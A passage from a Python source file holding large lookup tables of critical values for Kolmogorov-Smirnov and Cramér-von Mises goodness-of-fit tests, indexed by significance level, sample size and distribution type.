0.06831356769816821, 'beta4': 0.03593644546272762}, 400: {'uni': 0.050450659079979754, 'nor': 0.03581784094010593, 'beta1': 0.05056637414823473, 'beta2': 0.0729182038087659, 'beta4': 0.04001889562676658}, 300: {'uni': 0.058161445018157565, 'nor': 0.041252983698886025, 'beta1': 0.058325688269647125, 'beta2': 0.08170482185096284, 'beta4': 0.04612705504436812}, 200: {'uni': 0.07094962986364317, 'nor': 0.05046048885276999, 'beta1': 0.0712213019748647, 'beta2': 0.09581725770034533, 'beta4': 0.0563670463913345}, 150: {'uni': 0.0815744257595088, 'nor': 0.058060489761412676, 'beta1': 0.08204932927986253, 'beta2': 0.1075479659950831, 'beta4': 0.06500871809976655}, 100: {'uni': 0.09912785547497138, 'nor': 0.0707907611619234, 'beta1': 0.10021469580117251, 'beta2': 0.12475954060183503, 'beta4': 0.0790298213954928}, 75: {'uni': 0.11388087855996165, 'nor': 0.08144708523365077, 'beta1': 0.1151935997969889, 'beta2': 0.13944968782072553, 'beta4': 0.09073471227314939}, 50: {'uni': 0.13765260055314554, 'nor': 0.0991006689972383, 'beta1': 0.13998309637363815, 'beta2': 0.16393144318454161, 'beta4': 0.11023561371839477}, 30: {'uni': 0.1741856459150477, 'nor': 0.1269186751139828, 'beta1': 0.1778768200120303, 'beta2': 0.19832202672268084, 'beta4': 0.14017916545551046}, 20: {'uni': 0.20839509742333207, 'nor': 0.1535088033354377, 'beta1': 0.21387705197529588, 'beta2': 0.22870691603776427, 'beta4': 0.16824942099586182}, 10: {'uni': 0.2740727774470333, 'nor': 0.21222634033868049, 'beta1': 0.2828793884551896, 'beta2': 0.288383430493807, 'beta4': 0.22670497011739216}}, 0.3: {1000: {'uni': 0.03057612825774314, 'nor': 0.02199386622109878, 'beta1': 0.03061262686465055, 'beta2': 0.049703953698298386, 'beta4': 0.02447722233427918}, 750: {'uni': 0.03533838333580652, 'nor': 0.02530417208682001, 'beta1': 0.03537355380273649, 'beta2': 0.05399871759330599, 'beta4': 0.02823270309239162}, 500: {'uni': 0.043123689527982734, 'nor': 0.030927801548839978, 'beta1': 0.043123330457107534, 'beta2': 0.06396221956203696, 'beta4': 0.034528974097892545}, 400: {'uni': 0.04814799667805744, 'nor': 0.03456908247933843, 'beta1': 0.04823146494173067, 'beta2': 0.06837351075097187, 'beta4': 0.038486897300680556}, 300: {'uni': 0.05550906419590629, 'nor': 0.03978480548326124, 'beta1': 0.05571141547789926, 'beta2': 0.07663630270628857, 'beta4': 0.04434408116637903}, 200: {'uni': 0.06762156145960091, 'nor': 0.048648082377034274, 'beta1': 0.06798995743435188, 'beta2': 0.0901597857532756, 'beta4': 0.05417087708582158}, 150: {'uni': 0.0777889938150631, 'nor': 0.055992681950055134, 'beta1': 0.078310929702266, 'beta2': 0.10131183123822018, 'beta4': 0.062417414108562386}, 100: {'uni': 0.09459233371131393, 'nor': 0.06828184758918193, 'beta1': 0.09551945542738993, 'beta2': 0.1178069154885687, 'beta4': 0.07593328084768572}, 75: {'uni': 0.10866796055687228, 'nor': 0.07853952378167028, 'beta1': 0.10982303249195069, 'beta2': 0.13190968528845182, 'beta4': 0.08730445455818964}, 50: {'uni': 0.13131745651785992, 'nor': 0.09562198442675823, 'beta1': 0.1335175652395422, 'beta2': 0.15495495520954616, 'beta4': 0.10586806539719948}, 30: {'uni': 0.16622024765958232, 'nor': 0.1224700829191776, 'beta1': 0.16965623137726848, 'beta2': 0.18803738711333812, 'beta4': 0.13470969723802004}, 20: {'uni': 0.19877030362889103, 'nor': 0.14799815211895767, 'beta1': 0.20344160260647876, 'beta2': 0.21717215473139662, 'beta4': 0.161706399244382}, 10: {'uni': 0.26145583014921425, 'nor': 0.2046385546777918, 'beta1': 0.2695783330780789, 'beta2': 0.2744402713994778, 'beta4': 0.21759542548906985}}} # skipcq: FLK-E231, FLK-E501 # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' and the single # distributions in the initial CM-tests self.crit_val_ini_cm = {0.05: {1000: {'uni': 0.4594653273130281, 'nor': 0.12548409215203657, 'beta1': 0.4601325244776592, 'beta2': 2.6054538536684997, 'beta4': 0.19475509620124962}, 750: {'uni': 0.45799049980605744, 'nor': 0.12602524417442473, 'beta1': 0.46004206806029374, 'beta2': 2.1329896811378033, 'beta4': 0.19489847773362395}, 500: {'uni': 0.45925627371563715, 'nor': 0.12628494613337185, 'beta1': 0.46043257598514326, 'beta2': 1.8976333035266344, 'beta4': 0.19472713920556675}, 400: {'uni': 0.4550317088764882, 'nor': 0.12598689815558065, 'beta1': 0.4616845122929176, 'beta2': 1.67081859009825, 'beta4': 0.19310625273502202}, 300: {'uni': 0.4526386955716205, 'nor': 0.1258215616832631, 'beta1': 0.4621300837641701, 'beta2': 1.5237466437923628, 'beta4': 0.19308530495744508}, 200: {'uni': 0.4518991017642939, 'nor': 0.12579322471148224, 'beta1': 0.45814779697632135, 'beta2': 1.3141217632115256, 'beta4': 0.1907182023495619}, 150: {'uni': 0.4435801756869992, 'nor': 0.1261943477466138, 'beta1': 0.4603257655776193, 'beta2': 1.197499866156661, 'beta4': 0.19138023143214206}, 100: {'uni': 0.44398214960811005, 'nor': 0.1251049524249278, 'beta1': 0.45613701682564656, 'beta2': 1.0199854820373724, 'beta4': 0.1912520049669216}, 75: {'uni': 0.43855945433022814, 'nor': 0.12660427792231924, 'beta1': 0.4534542449640568, 'beta2': 0.9078879160230264, 'beta4': 0.18851203766812671}, 50: {'uni': 0.42185603966628915, 'nor': 0.1251135767029667, 'beta1': 0.4529463879788932, 'beta2': 0.7785693328825756, 'beta4': 0.18783979338011667}, 30: {'uni': 0.4007242486006498, 'nor': 0.12536020919060598, 'beta1': 0.433955290048165, 'beta2': 0.6300668797650217, 'beta4': 0.18309677695119683}, 20: {'uni': 0.37357963600331506, 'nor': 0.1244502347645548, 'beta1': 0.4098571660526302, 'beta2': 0.52578110215289, 'beta4': 0.17583001005443635}, 10: {'uni': 0.3015175081905277, 'nor': 0.12299654131879613, 'beta1': 0.3385532447833868, 'beta2': 0.35993981010958676, 'beta4': 0.1589058816117949}}, 0.001: {1000: {'uni': 1.161161598361952, 'nor': 0.2558443498119062, 'beta1': 1.1479519803384115, 'beta2': 6.709302131132306, 'beta4': 0.44475223680375087}, 750: {'uni': 1.151578196881537, 'nor': 0.2555050176799102, 'beta1': 1.1555400330755854, 'beta2': 5.432775518995104, 'beta4': 0.4383116823384742}, 500: {'uni': 1.1484428347021816, 'nor': 0.25417015345250027, 'beta1': 1.179178309999159, 'beta2': 4.891239107169016, 'beta4': 0.4389087929008622}, 400: {'uni': 1.1930541236855035, 'nor': 0.2518343883827663, 'beta1': 1.1803881424592395, 'beta2': 4.300235437758729, 'beta4': 0.4386478457920091}, 300: {'uni': 1.1473970431560971, 'nor': 0.25317628629366085, 'beta1': 1.1624327986427483, 'beta2': 3.8989413853739827, 'beta4': 0.44551847042340587}, 200: {'uni': 1.18082412252855, 'nor': 0.25899079782112855, 'beta1': 1.2025828386510071, 'beta2': 3.391511017366001, 'beta4': 0.4405063674404278}, 150: {'uni': 1.1387187678474655, 'nor': 0.25321382063754555, 'beta1': 1.1466986042414955, 'beta2': 2.970375106650482, 'beta4': 0.4398607423338549}, 100: {'uni': 1.1146160300547057, 'nor': 0.2591267084483367, 'beta1': 1.123764591588948, 'beta2': 2.557181557186044, 'beta4': 0.4349804526379736}, 75: {'uni': 1.1036094150895535, 'nor': 0.25037527962652184, 'beta1': 1.1576098464988671, 'beta2': 2.255565186689404, 'beta4': 0.4283114412555718}, 50: {'uni': 1.06359109192906, 'nor': 0.2593884319637725, 'beta1': 1.1172655406958785, 'beta2': 1.9088453990800698, 'beta4': 0.4147307819414802}, 30: {'uni': 0.9806221663466906, 'nor': 0.24979623637195073, 'beta1': 1.0995943461327278, 'beta2': 1.5374147736094401, 'beta4': 0.40449471961197647}, 20: {'uni': 0.9183844094874211, 'nor': 0.2410666264484626, 'beta1': 1.0121027232912676, 'beta2': 1.2429536313291623, 'beta4': 0.3910244272778875}, 10: {'uni': 0.705105426746303, 'nor': 0.2356691665356145, 'beta1': 0.7805556315358917, 'beta2': 0.8041905799529989, 'beta4': 0.3422805857620354}}, 0.005: {1000: {'uni': 0.8650500727527625, 'nor': 0.20355208320636353, 'beta1': 0.8609196227705078, 'beta2': 5.144036940610599, 'beta4': 0.3365600054421361}, 750: {'uni': 0.8626986115937819, 'nor': 0.1982484245115105, 'beta1': 0.8768929537385406, 'beta2': 4.121713329611062, 'beta4': 0.340394884525468}, 500: {'uni': 0.8463252948272091, 'nor': 0.204047905448246, 'beta1': 0.8643194167991456, 'beta2': 3.7142396090256673, 'beta4': 0.338149801728149}, 400: {'uni': 0.8759613393266179, 'nor': 0.20113796554865335, 'beta1': 0.8720674011608025, 'beta2': 3.234826377969159, 'beta4': 0.33251013574505706}, 300: {'uni': 0.8467830546773162, 'nor': 0.19835890349416413, 'beta1': 0.8625806550035283, 'beta2': 2.91747054310664, 'beta4': 0.3337907894045298}, 200: {'uni': 0.8671446864117717, 'nor': 0.19955136121772268, 'beta1': 0.8799640423750006, 'beta2': 2.5611562585381584, 'beta4': 0.33340460979200826}, 150: {'uni': 0.8504532982772084, 'nor': 0.20114192058643274, 'beta1': 0.8585546641050331, 'beta2': 2.2731935785727866, 'beta4': 0.33516132028355133}, 100: {'uni': 0.8262581996585238, 'nor': 0.20172429821482568, 'beta1': 0.8566261612415256, 'beta2': 1.9386478314789783, 'beta4': 0.33057577054096593}, 75: {'uni': 0.8231601092929631, 'nor': 0.19954548808488737, 'beta1': 0.8507692286383358, 'beta2': 1.7184750351160816, 'beta4': 0.3281716117279958}, 50: {'uni': 0.791311042044641, 'nor': 0.20201644061099297, 'beta1': 0.8253344560388312, 'beta2': 1.471598126502107, 'beta4': 0.3142747378332868}, 30: {'uni': 0.7454004085339159, 'nor': 0.19868948854462629, 'beta1': 0.8117279190997636, 'beta2': 1.163572754042539, 'beta4': 0.3134379622253203}, 20: {'uni': 0.6927111395174737, 'nor': 0.19799803099243843, 'beta1': 0.7690007170290268, 'beta2': 0.9674971023639148, 'beta4': 0.29755522914247085}, 10: {'uni': 0.5404922820663465, 'nor': 0.1897950283341688, 'beta1': 0.6048954133188673, 'beta2': 0.6396273271986439, 'beta4': 0.2661737354047272}}, 0.01: {1000: {'uni': 0.7366305701442963, 'nor': 0.18079399258995782, 'beta1': 0.7409500769469214, 'beta2': 4.379123588591741, 'beta4': 0.2924280426122813}, 750: {'uni': 0.7442238251513217, 'nor': 0.17730654116361785, 'beta1': 0.7432715265134635, 'beta2': 3.520644408051276, 'beta4': 0.2948533948139171}, 500: {'uni': 0.7295640623706077, 'nor': 0.18058378329387692, 'beta1': 0.7432308493338711, 'beta2': 3.1831218453213364, 'beta4': 0.29273348151982065}, 400: {'uni': 0.74825746560008, 'nor': 0.17857559572928583, 'beta1': 0.7513046011459512, 'beta2': 2.7813333770088593, 'beta4': 0.2920493370610846}, 300: {'uni': 0.7346085309181084, 'nor': 0.17814686297600194, 'beta1': 0.7384559054473249, 'beta2': 2.5293538764033396, 'beta4': 0.2930624211260037}, 200: {'uni': 0.7291492259573107, 'nor': 0.1770738854920472, 'beta1': 0.7468672378966367, 'beta2': 2.198188994091246, 'beta4': 0.2919775882512319}, 150: {'uni': 0.7235173729542574, 'nor': 0.17865467815894331, 'beta1': 0.7334497638668434, 'beta2': 1.9672046766786264, 'beta4': 0.2923645746551409}, 100: {'uni': 0.7062948565843012, 'nor': 0.17810159631256017, 'beta1': 0.7375298250695946, 'beta2': 1.6478430914391802, 'beta4': 0.2864079167189714}, 75: {'uni': 0.7048541225084534, 'nor': 0.1782357072385056, 'beta1': 0.7291152927800391, 'beta2': 1.4723510105994482, 'beta4': 0.28510459988581655}, 50: {'uni': 0.6822877555314413, 'nor': 0.17832163110271299, 'beta1': 0.7058926323102283, 'beta2': 1.2628603110009782, 'beta4': 0.2762680230658396}, 30: {'uni': 0.6438645415806148, 'nor': 0.17641294567529855, 'beta1': 0.6988358937799531, 'beta2': 1.00261546291451, 'beta4': 0.2728708936653677}, 20: {'uni': 0.5979389276979273, 'nor': 0.17733658586090492, 'beta1': 0.6634216883500963, 'beta2': 0.8401862828094895, 'beta4': 0.2581148398098823}, 10: {'uni': 0.47439214163279075, 'nor': 0.17006126698160068, 'beta1': 0.5291255307312486, 'beta2': 0.5561342600451974, 'beta4': 0.23396694517733096}}, 0.1: {1000: {'uni': 0.34460694172229767, 'nor': 0.10360382794686329, 'beta1': 0.34720511538309606, 'beta2': 1.8875836943154027, 'beta4': 0.15367514351394482}, 750: {'uni': 0.3451867692665267, 'nor': 0.10315529568661869, 'beta1': 0.3483346351805406, 'beta2': 1.5286450857480112, 'beta4': 0.1542030881869177}, 500: {'uni': 0.34164207323070384, 'nor': 0.10394394883772727, 'beta1': 0.34942375915790075, 'beta2': 1.3882095566154824, 'beta4': 0.15391095453357267}, 400: {'uni': 0.34651892768462955, 'nor': 0.1036273981872271, 'beta1': 0.3462081705189476, 'beta2': 1.2069446519288858, 'beta4': 0.1544497253882817}, 300: {'uni': 0.3428635737550537, 'nor': 0.1038942851019886, 'beta1': 0.3476223025035556, 'beta2': 1.1098635931611327, 'beta4': 0.15444570971940158}, 200: {'uni': 0.34041089582801143, 'nor': 0.10389233254481366, 'beta1': 0.34763445978967616, 'beta2': 0.9680266999416997, 'beta4': 0.15250676214014847}, 150: {'uni': 0.3377302693762681, 'nor': 0.10346526116949699, 'beta1': 0.34489227504038494, 'beta2': 0.8728702651269197, 'beta4': 0.1522928420716538}, 100: {'uni': 0.33355369989756883, 'nor': 0.10342904850983256, 'beta1': 0.3427607367426677, 'beta2': 0.7468081520100366, 'beta4': 0.151846388902334}, 75: {'uni': 0.3279519851250598, 'nor': 0.1033051672049144, 'beta1': 0.34059079399004955, 'beta2': 0.6701570036198051, 'beta4': 0.1507237727552958}, 50: {'uni': 0.320726154832351, 'nor': 0.10326137162907119, 'beta1': 0.33950765789386894, 'beta2': 0.5746838732278858, 'beta4': 0.1476312595625842}, 30: {'uni': 0.3048544686945858, 'nor': 0.1032506284925571, 'beta1': 0.3272112572888899, 'beta2': 0.4681866459910121, 'beta4': 0.14446811972146092}, 20: {'uni': 0.2846944243235544, 'nor': 0.1028801774665988, 'beta1': 0.31098139768353583, 'beta2': 0.39502874401480026, 'beta4': 0.14018723197105618}, 10: {'uni': 0.23151476199873214, 'nor': 0.10222753291379459, 'beta1': 0.2591691265371872, 'beta2': 0.27317146177593893, 'beta4': 0.12824901267237765}}, 0.2: {1000: {'uni': 0.23891699447877507, 'nor': 0.08094731846506226, 'beta1': 0.24094997843944543, 'beta2': 1.1721114900242817, 'beta4': 0.11543501824848225}, 750: {'uni': 0.2404933108907096, 'nor': 0.08091514974400534, 'beta1': 0.24060333173620502, 'beta2': 0.9693351882078056, 'beta4': 0.11578575775778918}, 500: {'uni': 0.23767299214394635, 'nor': 0.08143013376811509, 'beta1': 0.24272727287877066, 'beta2': 0.8833066278909469, 'beta4': 0.11540869401380342}, 400: {'uni': 0.2389502568536976, 'nor': 0.08131132500068124, 'beta1': 0.23929939472873027, 'beta2': 0.7740123343256322, 'beta4': 0.11612370917705966}, 300: {'uni': 0.23767421960657104, 'nor': 0.08137026978935988, 'beta1': 0.2413717405506026, 'beta2': 0.7075931771768734, 'beta4': 0.11572673022823697}, 200: {'uni': 0.2375380459668403, 'nor': 0.08138169789779784, 'beta1': 0.24093637511896582, 'beta2': 0.6212880525665451, 'beta4': 0.11464757578960799}, 150: {'uni': 0.2346674147394386, 'nor': 0.08111648704644667, 'beta1': 0.23871828329053957, 'beta2': 0.5639043523411755, 'beta4': 0.1144192658708614}, 100: {'uni': 0.23144277683193992, 'nor': 0.08086088008195286, 'beta1': 0.23765747593958084, 'beta2': 0.4871104294369415, 'beta4': 0.11369840709232508}, 75: {'uni': 0.22903357158577958, 'nor': 0.08107942066962537, 'beta1': 0.23687860277184203, 'beta2': 0.4387740764573971, 'beta4': 0.1133033325819042}, 50: {'uni': 0.22282964313663456, 'nor': 0.08128764938651908, 'beta1': 0.23467305038546576, 'beta2': 0.38174763155086583, 'beta4': 0.1112554646459918}, 30: {'uni': 0.21121535286091023, 'nor': 0.08154061002867806, 'beta1': 0.22669185244123524, 'beta2': 0.3149719244556432, 'beta4': 0.1087977058346659}, 20: {'uni': 0.19948749085011552, 'nor': 0.08117232367036036, 'beta1': 0.21669660949781708, 'beta2': 0.2693729942635194, 'beta4': 0.10597716119365037}, 10: {'uni': 0.16430469528177583, 'nor': 0.08150777731263585, 'beta1': 0.18122070967231182, 'beta2': 0.19059913324778516, 'beta4': 0.09776227574034621}}, 0.25: {1000: {'uni': 0.2073622245210208, 'nor': 0.07380009436406758, 'beta1': 0.20904068646385907, 'beta2': 0.9597148435930869, 'beta4': 0.10361053731297827}, 750: {'uni': 0.20830280107305865, 'nor': 0.07380726982919651, 'beta1': 0.2085995996243024, 'beta2': 0.7986091394776444, 'beta4': 0.10386137028660365}, 500: {'uni': 0.2063708005028261, 'nor': 0.07418743470211109, 'beta1': 0.21009413000274246, 'beta2': 0.7233087867046614, 'beta4': 0.103532945392617}, 400: {'uni': 0.20810791282236252, 'nor': 0.07407319000419614, 'beta1': 0.20749468421255743, 'beta2': 0.639061150743961, 'beta4': 0.1039097259786984}, 300: {'uni': 0.2069617339473839, 'nor': 0.07417041380366121, 'beta1': 0.20881311523590293, 'beta2': 0.5873404580341767, 'beta4': 0.10365164703335579}, 200: {'uni': 0.20633618881322238, 'nor': 0.07431380328185423, 'beta1': 0.2096349293319493, 'beta2': 0.5182222647556451, 'beta4': 0.10246873175611658}, 150: {'uni': 0.20397320572124797, 'nor': 0.07400405520839556, 'beta1': 0.20711157206009445, 'beta2': 0.47119547735400447, 'beta4': 0.10276373650008787}, 100: {'uni': 0.20130936260465182, 'nor': 0.07387183501067715, 'beta1': 0.20687465898503946, 'beta2': 0.40718701425151566, 'beta4': 0.10182092379405154}, 75: {'uni': 0.19852776314003645, 'nor': 0.07393158430130788, 'beta1': 0.20550667909573891, 'beta2': 0.3693192980610446, 'beta4': 0.10150395150740255}, 50: {'uni': 0.19388474978484183, 'nor': 0.07420083364025896, 'beta1': 0.20350014172907788, 'beta2': 0.32356832480704306, 'beta4': 0.0999746406180958}, 30: {'uni': 0.18355727709549313, 'nor': 0.07451794632809351, 'beta1': 0.19616222630838362, 'beta2': 0.26786333649854016, 'beta4': 0.0976861971100757}, 20: {'uni': 0.17328456961586736, 'nor': 0.07429319062250538, 'beta1': 0.18715487185431445, 'beta2': 0.23051142471255764, 'beta4': 0.09527608612752941}, 10: {'uni': 0.1439420051439661, 'nor': 0.07448506284496655, 'beta1': 0.15783717122161106, 'beta2': 0.165322481393709, 'beta4': 0.0881875611186847}}, 0.3: {1000: {'uni': 0.18266493036122441, 'nor': 0.06787398648836995, 'beta1': 0.18413714303934486, 'beta2': 0.7939484739262997, 'beta4': 0.09424089113895272}, 750: {'uni': 0.1834933385424178, 'nor': 0.06774823495176488, 'beta1': 0.18328690579924797, 'beta2': 0.6657885178958219, 'beta4': 0.09411764242286233}, 500: {'uni': 0.18210747710096634, 'nor': 0.0682050076857646, 'beta1': 0.18545982860570304, 'beta2': 0.6035300802969183, 'beta4': 0.09382274022146861}, 400: {'uni': 0.18303077478939317, 'nor': 0.06803420606952354, 'beta1': 0.1832023300936057, 'beta2': 0.5348503605172882, 'beta4': 0.09439504810213005}, 300: {'uni': 0.18177746911539827, 'nor': 0.06818473058282226, 'beta1': 0.18428212132088345, 'beta2': 0.4902376235565143, 'beta4': 0.09403788951347426}, 200: {'uni': 0.1816800164976337, 'nor': 0.06833889279734263, 'beta1': 0.18433678860840758, 'beta2': 0.4357735417384846, 'beta4': 0.0930165257817752}, 150: {'uni': 0.17998814397403265, 'nor': 0.06806323128922373, 'beta1': 0.18235304873781227, 'beta2': 0.3987631304299662, 'beta4': 0.09300297461109802}, 100: {'uni': 0.17734862196792756, 'nor': 0.06787056258025743, 'beta1': 0.18232920738794536, 'beta2': 0.34628591421707594, 'beta4': 0.09251758018601589}, 75: {'uni': 0.17501811415904828, 'nor': 0.06794778939736534, 'beta1': 0.1811216846739435, 'beta2': 0.31515956986054794, 'beta4': 0.09227802527028829}, 50: {'uni': 0.17127286320423607, 'nor': 0.06825835640417134, 'beta1': 0.1783095339004599, 'beta2': 0.2773715225887576, 'beta4': 0.09083180121082819}, 30: {'uni': 0.16210318531956106, 'nor': 0.06864306659301066, 'beta1': 0.17243143687559875, 'beta2': 0.23158692745518694, 'beta4': 0.08861156990151152}, 20: {'uni': 0.15293857531053232, 'nor': 0.06842370561655187, 'beta1': 0.1646586342377624, 'beta2': 0.20028710138975353, 'beta4': 0.08663292264169759}, 10: {'uni': 0.12764289106639928, 'nor': 0.06890998128086945, 'beta1': 0.13899778934023796, 'beta2': 0.1452153818161471, 'beta4': 0.08038247939430213}}} # skipcq: FLK-E231, FLK-E501 # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update step and the single distributions in the s_ks-tests in the update steps self.crit_val_upd_ks = {0.001: {1000: {1000: {'uni': 0.06194167830060293, 'nor': 0.07822872053106872, 'beta1': 0.060972223483102383, 'beta2': 0.1259312803264634, 'beta4': 0.053644805280471275}, 750: {'uni': 0.07013498250410122, 'nor': 0.0846176702668644, 'beta1': 0.07382074910040726, 'beta2': 0.12721212549622074, 'beta4': 0.06265031431957047}, 500: {'uni': 0.08868191404192605, 'nor': 0.10172187597321586, 'beta1': 0.08635714610250639, 'beta2': 0.1354501683123147, 'beta4': 0.07939958283221715}, 400: {'uni': 0.09466328320945472, 'nor': 0.10653424583665405, 'beta1': 0.09812143640789389, 'beta2': 0.14231851569369025, 'beta4': 0.09001786186298039}, 300: {'uni': 0.112900393327934, 'nor': 0.11948590318054664, 'beta1': 0.1128099223418304, 'beta2': 0.15412182838111443, 'beta4': 0.10688640573728891}, 200: {'uni': 0.13999451914937044, 'nor': 0.14525209648524945, 'beta1': 0.1363146522235133, 'beta2': 0.17279316051643773, 'beta4': 0.13132853027863567}, 150: {'uni': 0.15825801427544206, 'nor': 0.16624699603775567, 'beta1': 0.15782699160464128, 'beta2': 0.19586569775328777, 'beta4': 0.15093718225825237}, 100: {'uni': 0.19109919414724275, 'nor': 0.19819275001361214, 'beta1': 0.19211678955447464, 'beta2': 0.21880574483038184, 'beta4': 0.18949005031175215}, 75: {'uni': 0.2198169498248439, 'nor': 0.22313893040183352, 'beta1': 0.22260086497739834, 'beta2': 0.24861080819897047, 'beta4': 0.21646042451513092}, 50: {'uni': 0.27110531940815974, 'nor': 0.26870229964436126, 'beta1': 0.27154448822648203, 'beta2': 0.2925856220451067, 'beta4': 0.2690827053650406}, 30: {'uni': 0.341159036875694, 'nor': 0.34417584958804415, 'beta1': 0.34742946906497024, 'beta2': 0.35887753792308147, 'beta4': 0.34251314662315646}, 20: {'uni': 0.4247074513367157, 'nor': 0.4257230167126152, 'beta1': 0.4147166360680411, 'beta2': 0.42712883590666906, 'beta4': 0.4243734735369824}, 10: {'uni': 0.5883376017796452, 'nor': 0.5763352676031682, 'beta1': 0.5744260319735885, 'beta2': 0.5823827801917355, 'beta4': 0.5678433762722503}}, 750: {1000: {'uni': 0.0611759570618689, 'nor': 0.08090222271917469, 'beta1': 0.06269089313861997, 'beta2': 0.12229377182596635, 'beta4': 0.05189322774912314}, 750: {'uni': 0.06999691237536224, 'nor': 0.08755856539246498, 'beta1': 0.07015966614757518, 'beta2': 0.12824148557035264, 'beta4': 0.06188500275856437}, 500: {'uni': 0.08538842360253246, 'nor': 0.10140984451333485, 'beta1': 0.08689642339864323, 'beta2': 0.1347503234468263, 'beta4': 0.07734069816818492}, 400: {'uni': 0.09683865057491581, 'nor': 0.11198143598374655, 'beta1': 0.0966354900118695, 'beta2': 0.14394540297183944, 'beta4': 0.08763861812335089}, 300: {'uni': 0.11157253985246895, 'nor': 0.12602422854188344, 'beta1': 0.11244663757346751, 'beta2': 0.1554651616593184, 'beta4': 0.10415578668422443}, 200: {'uni': 0.13654464830576057, 'nor': 0.15133013476858165, 'beta1': 0.13839044278268253, 'beta2': 0.16561454357136107, 'beta4': 0.13143244333617032}, 150: {'uni': 0.15622840528205983, 'nor': 0.16817043946341126, 'beta1': 0.15548905512988154, 'beta2': 0.18938825998267717, 'beta4': 0.14980964956382015}, 100: {'uni': 0.19579707682616415, 'nor': 0.19493448629254073, 'beta1': 0.1907364681295448, 'beta2': 0.21379910922104456, 'beta4': 0.18921973720089247}, 75: {'uni': 0.2217040971984533, 'nor': 0.22676199918015594, 'beta1': 0.22281270555321675, 'beta2': 0.24553068147624701, 'beta4': 0.2185653911488343}, 50: {'uni': 0.28058489484935584, 'nor': 0.2726192686778714, 'beta1': 0.27549434346061347, 'beta2': 0.2963953500479535, 'beta4': 0.2613706221802624}, 30: {'uni': 0.3542190682518411, 'nor': 0.3609105538670239, 'beta1': 0.346103596210534, 'beta2': 0.37037725489911305, 'beta4': 0.34271197416665083}, 20: {'uni': 0.4192705279674709, 'nor': 0.4227233474310455, 'beta1': 0.41559337298012755, 'beta2': 0.4320244942862363, 'beta4': 0.417645435565697}, 10: {'uni': 0.581210346357099, 'nor': 0.5914300273318283, 'beta1': 0.5798222632426484, 'beta2': 0.576140120904139, 'beta4': 0.5755991159580565}}, 500: {1000: {'uni': 0.06036407215881656, 'nor': 0.09090115403529747, 'beta1': 0.06255930197979287, 'beta2': 0.13359354983685368, 'beta4': 0.05069644528510775}, 750: {'uni': 0.07028443525653139, 'nor': 0.09555844399847702, 'beta1': 0.07153464071873405, 'beta2': 0.139381271869496, 'beta4': 0.060482876205486535}, 500: {'uni': 0.08736257185674318, 'nor': 0.10986008971817585, 'beta1': 0.08806460210132372, 'beta2': 0.14662206874056294, 'beta4': 0.07355203635067697}, 400: {'uni': 0.09738153077428247, 'nor': 0.11929320722653125, 'beta1': 0.09822023903171845, 'beta2': 0.1554507716764446, 'beta4': 0.0856711290635534}, 300: {'uni': 0.1142826184827973, 'nor': 0.13333306355949393, 'beta1': 0.11167159945610117, 'beta2': 0.16891471559153437, 'beta4': 0.10481821179485074}, 200: {'uni': 0.13674660783901085, 'nor': 0.1510767540153743, 'beta1': 0.13945129736328155, 'beta2': 0.1856231161919606, 'beta4': 0.1275501476407893}, 150: {'uni': 0.15662754110107693, 'nor': 0.17132793534131086, 'beta1': 0.1584778040085073, 'beta2': 0.20319728743391985, 'beta4': 0.14506897344382674}, 100: {'uni': 0.19187926872498368, 'nor': 0.20409409384231936, 'beta1': 0.18927583777700208, 'beta2': 0.23363291179999657, 'beta4': 0.18630089408915784}, 75: {'uni': 0.2198773014226113, 'nor': 0.22969594012702854, 'beta1': 0.22501859827640036, 'beta2': 0.2537264924207476, 'beta4': 0.22025245598758353}, 50: {'uni': 0.26703941343557996, 'nor': 0.2709855298709943, 'beta1': 0.26520771720638253, 'beta2': 0.30140881449323687, 'beta4': 0.2690849811291071}, 30: {'uni': 0.34535681060535584, 'nor': 0.3531786350766798, 'beta1': 0.34464606252236557, 'beta2': 0.3579140519043085, 'beta4': 0.34385764547646414}, 20: {'uni': 0.41654437214179635, 'nor': 0.4238773679688896, 'beta1': 0.4156688979762777, 'beta2': 0.4342947530823177, 'beta4': 0.41234511208135727}, 10: {'uni': 0.5927880081321425, 'nor': 0.571169284617098, 'beta1': 0.5890376211941302, 'beta2': 0.5799218969338741, 'beta4': 0.5772716599910823}}, 400: {1000: {'uni': 0.061610633047749275, 'nor': 0.09387417997070269, 'beta1': 0.060006123541623435, 'beta2': 0.13359508313715762, 'beta4': 0.050499024612637056}, 750: {'uni': 0.0725990060934733, 'nor': 0.09999368681512216, 'beta1': 0.0714711957562868, 'beta2': 0.1396657769543962, 'beta4': 0.05786321789604981}, 500: {'uni': 0.08793932634136903, 'nor': 0.1132890416520379, 'beta1': 0.08764486030536317, 'beta2': 0.1506116538331888, 'beta4': 0.07384003832444169}, 400: {'uni': 0.09509051332670226, 'nor': 0.12086275924386036, 'beta1': 0.09874882902727133, 'beta2': 0.15349299194370858, 'beta4': 0.0849049812616951}, 300: {'uni': 0.11300077096060224, 'nor': 0.13104186476027302, 'beta1': 0.11236264122161288, 'beta2': 0.16671246834931386, 'beta4': 0.10114052127037293}, 200: {'uni': 0.1395767904072489, 'nor': 0.15649703354689593, 'beta1': 0.1351482372851951, 'beta2': 0.18210013561700988, 'beta4': 0.12703437853096244}, 150: {'uni': 0.15452108891403543, 'nor': 0.17408683153597787, 'beta1': 0.15978450832788405, 'beta2': 0.2010339358813732, 'beta4': 0.1490451838403622}, 100: {'uni': 0.19691519706645344, 'nor': 0.20754956592257726, 'beta1': 0.19346981123970686, 'beta2': 0.2262546151997452, 'beta4': 0.18064848788367147}, 75: {'uni': 0.22469725100342314, 'nor': 0.2339068463269146, 'beta1': 0.218862094384225, 'beta2': 0.2504781042902142, 'beta4': 0.20969832951840517}, 50: {'uni': 0.2709684908276241, 'nor': 0.28043279667873244, 'beta1': 0.2702125438110171, 'beta2': 0.2976958783167438, 'beta4': 0.2606895236787564}, 30: {'uni': 0.34168179557445916, 'nor': 0.3593449909357798, 'beta1': 0.35415662361849687, 'beta2': 0.36288665404801707, 'beta4': 0.34182381626396197}, 20: {'uni': 0.4206707653595654, 'nor': 0.43121866894350125, 'beta1': 0.42741727811475116, 'beta2': 0.4389309415030842, 'beta4': 0.4300646949028815}, 10: {'uni': 0.5741086400057797, 'nor': 0.5830036630879967, 'beta1': 0.5709629834592885, 'beta2': 0.5875161854960175, 'beta4': 0.5881252365619546}}, 300: {1000: {'uni': 0.062161639188960005, 'nor': 0.10294382539615143, 'beta1': 0.0611596822319877, 